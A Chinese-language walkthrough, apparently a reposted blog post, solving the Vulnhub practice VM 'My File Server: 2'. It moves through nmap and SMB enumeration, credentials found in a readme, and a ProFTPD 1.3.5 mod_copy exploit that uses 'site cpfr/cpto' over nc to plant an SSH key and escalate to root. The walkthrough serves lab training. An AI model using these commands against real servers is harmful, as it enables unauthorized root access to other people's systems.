Vulnhub靶機(jī)介紹:
vulnhub是個(gè)提供各種漏洞平臺(tái)的綜合靶場(chǎng),可供下載多種虛擬機(jī)進(jìn)行下載,本地VM打開(kāi)即可,像做游戲一樣去完成滲透測(cè)試、提權(quán)、漏洞利用、代碼審計(jì)等等有趣的實(shí)戰(zhàn)。
這是一個(gè)漏洞靶機(jī),老樣子需要找到flag即可。
Vulnhub靶機(jī)下載:
官方下載:https://download.vulnhub.com/myfileserver/My_file_server_2.ova
Vulnhub靶機(jī)安裝:
下載好了把安裝包解壓 然后使用Oracle VM打開(kāi)即可。
Vulnhub靶機(jī)漏洞詳解:
①:信息收集:
kali里使用netdiscover
發(fā)現(xiàn)主機(jī)
滲透機(jī):kali IP :192.168.0.104 靶機(jī)IP :192.168.0.103
使用命令:
nmap -sS -sV -A -n -p- 192.168.0.103
發(fā)現(xiàn)開(kāi)啟了很多端口 先使用工具老樣子掃描80
端口 dirsearch
發(fā)現(xiàn)了一個(gè)readme.txt 得到一個(gè)密碼:root/root1
②:FTP匿名登入
嘗試FTP
登入 發(fā)現(xiàn)沒(méi)有權(quán)限 嘗試匿名發(fā)現(xiàn)里面也沒(méi)有可以利用的信息。
③:SSH私鑰登入
接著嘗試SSH
登入失敗,需要私鑰才能登入!
④:SMB共享服務(wù):
這里還有個(gè)文件共享服務(wù)Smb
先嘗試使用smbmap
進(jìn)行掃描查看文件,發(fā)現(xiàn)存在私鑰文件 等下生成一個(gè)進(jìn)行替換即可。
smbclient '\\192.168.159.187\smbdata' guest #登入smb
生成私鑰:ssh-keygen
⑤:漏洞發(fā)現(xiàn)(ProFTPD 1.3.5):
這里還有個(gè)2121
端口 發(fā)現(xiàn)版本號(hào)為:ProFTPD 1.3.5
使用本地漏洞庫(kù)searchsploit
搜一下看看有沒(méi)有相關(guān)利用文件
⑥:漏洞利用:
發(fā)現(xiàn)存在文件復(fù)制漏洞嘗試?yán)茫?/strong>
nc 192.168.0.103 2121
site cpfr /smbdata/authorized_keys
site cpto /home/smbuser/.ssh/authorized_keys # 一般服務(wù)創(chuàng)建時(shí)會(huì)同時(shí)建一個(gè)smbuser用戶(hù)
直接ssh
登入smbuser
用戶(hù) su root
輸入上面獲取到的密碼直接是root
權(quán)限了
至此獲取到了flag,滲透測(cè)試結(jié)束。
Vulnhub靶機(jī)滲透總結(jié):
這個(gè)靶機(jī)難度適中
1.信息收集 獲取ip地址 和端口信息 web掃描工具:nikto,dirb,dirbuster
2.smb
共享 smbmap
枚舉(工具得使用)ssh私
鑰登入
3.ProFTPD 1.3.5
文件復(fù)制漏洞利用文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-418009.html
希望對(duì)剛?cè)腴T(mén)得小白有幫助!最后創(chuàng)作不易 希望對(duì)大家有所幫助 喜歡的話(huà)麻煩大家給個(gè)一鍵三連 你的開(kāi)心就是我最大的快樂(lè)?。?/strong>文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-418009.html
到了這里,關(guān)于看完這篇 教你玩轉(zhuǎn)滲透測(cè)試靶機(jī)vulnhub——My File Server: 2的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!